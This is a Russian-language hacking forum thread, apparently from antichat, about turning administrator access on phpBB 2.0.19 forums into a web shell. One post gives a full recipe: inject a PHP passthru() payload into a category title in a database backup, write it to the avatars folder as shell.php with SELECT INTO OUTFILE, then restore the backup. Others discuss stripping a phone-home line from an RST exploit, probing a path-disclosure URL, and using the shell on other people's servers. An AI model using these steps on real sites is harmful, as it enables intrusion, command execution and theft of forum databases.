Каким образом можно получить шелл на phpBB 2.0.19, если есть права админа. Хочу сделать дамп баз, подключить шелл, но не знаю как открыть установочный путь форума, пробовал http://www.site.com/phpbb/admin/admin_disa...p?setmodules=00, но отображается пустая страница.....
А не проще при помощи сплойта от Rst выполнения удаленных команд, залить их шелл? И базу не мучатся качать. Вот тут обсуждалось http://forum.antichat.ru/thread17477-2.0.19.html
Блин, я шелл в 2.0.19 делал так... заходил в админку, сохранял БД на винт, искал там вот таку строку: INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', 'test', '10'); потом заменял на INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? passthru("$cmd"); ?>', '10'); SELECT cat_title INTO OUTFILE '/home/test2.ru/www/phpbb/images/avatars/shell.php' FROM phpbb_categories where cat_id=1; UPDATE phpbb_categories SET cat_title='test'WHERE cat_id=1; (после этой строки поставь ещё один Enter). Сохранял файл... и восстанавливал БД. После вот по этому home/test2.ru/www/phpbb/images/avatars/shell.php у меня был шелл. НУ а дальше сам!
Dr.Check Я так тоже делал на локалхосте, всё легко, так как ты знаеш полный путь к форуму home/test2.ru/www/phpbb А как ты собираешся его узнать на чужом серваке?
А разве это как-то сказывается на его работе? На локалхосте работал, а чтоб поправить не хватает заний перла... жаль
Всмысле домой - к рст? Как почистить сплоит? Помогите Могу просто удалить строчку $xpl->get(&about.'/'.chr(105).chr(100).chr(115).'/'.chr(105).chr(100).chr(115).'.php?='.$ids); Но будет ли он работать, а то тут что-то зашифровали Работает в младших версиях, у меня открывает пустую страницу
Вот так пробовал? http://someserver.com/phpBB///admin/admin_disallow.php?setmodules=1 ? или с одним слешем?
Комманды с радостью выполняются вот таким способом http://packetstormsecurity.org/0604-advisories/phpbb-admin.txt
